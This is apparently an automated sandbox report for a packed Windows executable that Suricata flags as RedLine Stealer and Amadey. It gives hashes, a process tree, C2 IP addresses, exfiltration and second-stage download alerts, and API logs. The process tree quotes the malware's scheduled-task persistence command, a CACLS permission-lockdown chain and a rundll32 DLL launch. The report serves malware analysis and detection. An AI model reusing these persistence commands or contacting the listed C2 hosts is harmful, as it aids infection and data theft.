Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 10, 2023, 6:10 p.m.	July 10, 2023, 6:14 p.m.

Size	538.2KB
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	`09cea48e485e3b4f35e25db8aef6926c`
SHA256	`00cec0fd19876dbb3af9f25554fa6f4d32514e2e1ef310127f9a0188747e2b4b`
CRC32	`47BED367`
ssdeep	`12288:gk8xHz47KQQOcfbqbCdA0BVKLbilxR5m:IT47KQQljkCL3K4R`
Yara	UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description)

fotod45.exe "C:\Users\test22\AppData\Local\Temp\fotod45.exe"
2640
- y3022941.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y3022941.exe
  2744
  - k3948274.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\k3948274.exe
    2788
  - l4090866.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\l4090866.exe
    2980
- n9579444.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\n9579444.exe
  2200
  - danke.exe "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe"
    2456
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
      2596
    - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
      2672
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2816
      - cacls.exe CACLS "danke.exe" /P "test22:N"
        2392
      - cacls.exe CACLS "danke.exe" /P "test22:R" /E
        2952
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        776
      - cacls.exe CACLS "..\3ec1f323b5" /P "test22:N"
        1656
      - cacls.exe CACLS "..\3ec1f323b5" /P "test22:R" /E
        2972
    - foto175.exe "C:\Users\test22\AppData\Local\Temp\1000010051\foto175.exe"
      1976
      - x6385145.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\x6385145.exe
        1616
        
        f4388758.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\f4388758.exe
        1484
    - fotod45.exe "C:\Users\test22\AppData\Local\Temp\1000011051\fotod45.exe"
      2236
      - y3346153.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\y3346153.exe
        2440
        
        k9205098.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\k9205098.exe
        2684
        
        l4326779.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\l4326779.exe
        452
      - n4210104.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\n4210104.exe
        2936
    - du.exe "C:\Users\test22\AppData\Local\Temp\1000012051\du.exe"
      2736
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      2996
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
77.91.124.31	Active	Moloch
77.91.68.3	Active	Moloch
77.91.68.48	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043233	ET MALWARE RedLine Stealer TCP CnC net.tcp Init	A Network Trojan was detected
TCP 192.168.56.101:49181 -> 77.91.124.31:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.68.48:19071 -> 192.168.56.101:49166	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.124.31:80 -> 192.168.56.101:49181	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.124.31:80 -> 192.168.56.101:49181	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.124.31:80 -> 192.168.56.101:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.124.31:80 -> 192.168.56.101:49181	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043233	ET MALWARE RedLine Stealer TCP CnC net.tcp Init	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.68.48:19071 -> 192.168.56.101:49191	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.101:49187 -> 77.91.68.3:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49180 -> 77.91.68.3:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 77.91.68.3:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49187 -> 77.91.68.3:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49180 -> 77.91.68.3:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 77.91.68.48:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49181 -> 77.91.124.31:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49181	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49181	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.101:49181 -> 77.91.124.31:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49181 -> 77.91.124.31:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49194 -> 77.91.68.3:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49194 -> 77.91.68.3:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 77.91.68.3:80 -> 192.168.56.101:49194	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.68.3:80 -> 192.168.56.101:49194	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.3:80 -> 192.168.56.101:49194	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (25 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 10, 2023, 6:13 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (11 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 10, 2023, 6:10 p.m.			0	0
IsDebuggerPresent July 10, 2023, 6:10 p.m.			0	0
IsDebuggerPresent July 10, 2023, 6:10 p.m.			0	0
IsDebuggerPresent July 10, 2023, 6:10 p.m.			0	0
IsDebuggerPresent July 10, 2023, 6:13 p.m.			0	0
IsDebuggerPresent July 10, 2023, 6:13 p.m.			0	0
IsDebuggerPresent July 10, 2023, 6:13 p.m.			0	0
IsDebuggerPresent July 10, 2023, 6:13 p.m.			0	0
IsDebuggerPresent July 10, 2023, 6:13 p.m.			0	0
IsDebuggerPresent July 10, 2023, 6:13 p.m.			0	0
IsDebuggerPresent July 10, 2023, 6:13 p.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 10, 2023, 6:12 p.m.	buffer: SUCCESS: The scheduled task "danke.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW July 10, 2023, 6:12 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW July 10, 2023, 6:12 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 10, 2023, 6:12 p.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (34 events)

Time & API	Arguments	Status	Return
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035b5b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035be78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035be78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035bd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896f78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896f78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00896ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008970f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008979b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008979b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 10, 2023, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00897878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 10, 2023, 6:10 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.cjwqrjx

One or more processes crashed (50 out of 52 events)

Time & API	Arguments	Status
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0x4c5d269 0x4c5d06b 0x4c57ad8 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4c5d3a0 registers.esp: 37482404 registers.edi: 37482456 registers.eax: 0 registers.ebp: 37482468 registers.edx: 3436416 registers.ebx: 37483908 registers.esi: 41816440 registers.ecx: 0	1
